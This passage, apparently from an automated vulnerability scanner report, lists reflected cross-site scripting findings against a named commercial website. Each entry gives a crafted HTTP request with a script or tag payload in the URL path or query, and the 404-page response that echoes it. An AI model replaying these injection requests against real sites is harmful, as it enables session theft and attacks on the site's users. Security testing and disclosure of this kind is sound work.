This shows that new HTML tags can be injected into the returned document. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it, so every path segment and query component of a request that reaches that handler lands in the same HTML text context. The scanner probed this segment only with a bare <a> tag, which is why confidence is Firm rather than Certain; the same echo reflects <script>alert(1)</script> verbatim for REST URL parameters 1 and 3 of this URL (the entries on either side), so the lower confidence reflects the probe used, not a filter on this segment. Confirm manually with a script payload in this segment before rating this finding differently from the others on this path.

Request

GET /detail/5768bf<a>1c24e3b2db6/myresellerpanel-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5768bf<a>1c24e3b2db6/myresellerpanel-com.html was not found on this server.</p>
...[SNIP]...

2.3353. http://www.resellerbase.com/detail/5/myresellerpanel-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/myresellerpanel-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93a7b<script>alert(1)</script>3fb77ce6e40 was submitted in REST URL parameter 3 (replacing the file name after /detail/5/) and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

Request

GET /detail/5/93a7b<script>alert(1)</script>3fb77ce6e40 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/93a7b<script>alert(1)</script>3fb77ce6e40 was not found on this server.</p>
...[SNIP]...

2.3354. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cba0<script>alert(1)</script>299da5dbf39e6391f was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

A redirection occurred between the attack request and the response containing the echoed input; the response shown below is the one reached after following it. The redirect must be followed for the attack to succeed, which a browser does automatically.

The original request was the rating submission, sent with the POST method; it was possible to convert it to a GET request (id=5&rating=5 in the query string) for easier demonstration and delivery. The entry that follows reaches the same injection point with a plain GET to rating.php and no redirect.

Request

GET /detail9cba0<script>alert(1)</script>299da5dbf39e6391f/5/rating.php?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9cba0<script>alert(1)</script>299da5dbf39e6391f/5/rating.php?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3355. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f292b<script>alert(1)</script>3d11027764d was submitted in REST URL parameter 1 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs. This entry duplicates the preceding one for the same injection point, reached here by a plain GET without the rating parameters or the redirect.

Request

GET /detailf292b<script>alert(1)</script>3d11027764d/5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf292b<script>alert(1)</script>3d11027764d/5/rating.php was not found on this server.</p>
...[SNIP]...

2.3356. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload add31<script>alert(1)</script>208d6c7df16a16208 was submitted in REST URL parameter 2 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

A redirection occurred between the attack request and the response containing the echoed input; the response shown below is the one reached after following it. The redirect must be followed for the attack to succeed, which a browser does automatically.

The original request was the rating submission, sent with the POST method; it was possible to convert it to a GET request (id=5&rating=5 in the query string) for easier demonstration and delivery. The entry that follows reaches the same injection point with a plain GET to rating.php and no redirect.

Request

GET /detail/5add31<script>alert(1)</script>208d6c7df16a16208/rating.php?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5add31<script>alert(1)</script>208d6c7df16a16208/rating.php?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3357. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79779<script>alert(1)</script>295825983bf was submitted in REST URL parameter 2 and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs. This entry duplicates the preceding one for the same injection point, reached here by a plain GET without the rating parameters or the redirect.

Request

GET /detail/579779<script>alert(1)</script>295825983bf/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/579779<script>alert(1)</script>295825983bf/rating.php was not found on this server.</p>
...[SNIP]...

2.3358. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad187<script>alert(1)</script>409c316491ff9bc59 was submitted in REST URL parameter 3 (appended to rating.php, before the query string) and was echoed unmodified in the application's response.

This proof of concept shows that arbitrary JavaScript can be injected into the response; the path itself carries the payload, so delivery needs only a crafted link. The sink is the site's custom 404 page, which writes the raw request URL into its "The requested URL ... was not found on this server." text without HTML-encoding it; every path segment and query component of a request that reaches that handler lands in the same HTML text context, so this and the other per-parameter findings for this path are one defect in the 404 handler rather than separate bugs.

A redirection occurred between the attack request and the response containing the echoed input; the response shown below is the one reached after following it. The redirect must be followed for the attack to succeed, which a browser does automatically.

The original request was the rating submission, sent with the POST method; it was possible to convert it to a GET request (id=5&rating=5 in the query string) for easier demonstration and delivery. The entry that follows reaches the same injection point with a plain GET to rating.php and no redirect.

Request

GET /detail/5/rating.phpad187<script>alert(1)</script>409c316491ff9bc59?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.phpad187<script>alert(1)</script>409c316491ff9bc59?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3359. http://www.resellerbase.com/detail/5/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 182e1<script>alert(1)</script>9eeb340b491 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/rating.php182e1<script>alert(1)</script>9eeb340b491 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.php182e1<script>alert(1)</script>9eeb340b491 was not found on this server.</p>
...[SNIP]...

2.3360. http://www.resellerbase.com/detail/5/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3d73<script>alert(1)</script>2d296e58c54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/rating.php?e3d73<script>alert(1)</script>2d296e58c54=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.php?e3d73<script>alert(1)</script>2d296e58c54=1 was not found on this server.</p>
...[SNIP]...

2.3361. http://www.resellerbase.com/detail/5/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 68a70<script>alert(1)</script>315f4964c2c88a88c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/5/rating.php/68a70<script>alert(1)</script>315f4964c2c88a88c?id=5&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/rating.php/68a70<script>alert(1)</script>315f4964c2c88a88c?id=5&rating=5 was not found on this server.</p>
...[SNIP]...

2.3362. http://www.resellerbase.com/detail/5/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5643a<script>alert(1)</script>a5f86aa6a7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5643a<script>alert(1)</script>a5f86aa6a7e/5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5643a<script>alert(1)</script>a5f86aa6a7e/5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3363. http://www.resellerbase.com/detail/5/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1030a<script>alert(1)</script>374a8e5e0df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/51030a<script>alert(1)</script>374a8e5e0df/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/51030a<script>alert(1)</script>374a8e5e0df/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3364. http://www.resellerbase.com/detail/5/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3b8d6<script>alert(1)</script>eb884527faa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/search.php3b8d6<script>alert(1)</script>eb884527faa?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php3b8d6<script>alert(1)</script>eb884527faa?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3365. http://www.resellerbase.com/detail/5/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 16f47<a>a9e6daaeb41 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search16f47<a>a9e6daaeb41&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...&Submit3=Search16f47<a>a9e6daaeb41&opt=2 was not found on this server.</p>
...[SNIP]...

2.3366. http://www.resellerbase.com/detail/5/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 62cf1<a>779690e0929 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/search.php?keyword=search...62cf1<a>779690e0929&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...62cf1<a>779690e0929&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3367. http://www.resellerbase.com/detail/5/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2f380<script>alert(1)</script>fcd471cf19d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search&opt=2&2f380<script>alert(1)</script>fcd471cf19d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...&Submit3=Search&opt=2&2f380<script>alert(1)</script>fcd471cf19d=1 was not found on this server.</p>
...[SNIP]...

2.3368. http://www.resellerbase.com/detail/5/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/5/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6e838<a>ba928c7cd3e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/5/search.php?keyword=search...&Submit3=Search&opt=26e838<a>ba928c7cd3e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/5/search.php?keyword=search...&Submit3=Search&opt=26e838<a>ba928c7cd3e was not found on this server.</p>
...[SNIP]...

2.3369. http://www.resellerbase.com/detail/5/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dbfa6<script>alert(1)</script>35cf926256a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildbfa6<script>alert(1)</script>35cf926256a/5/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
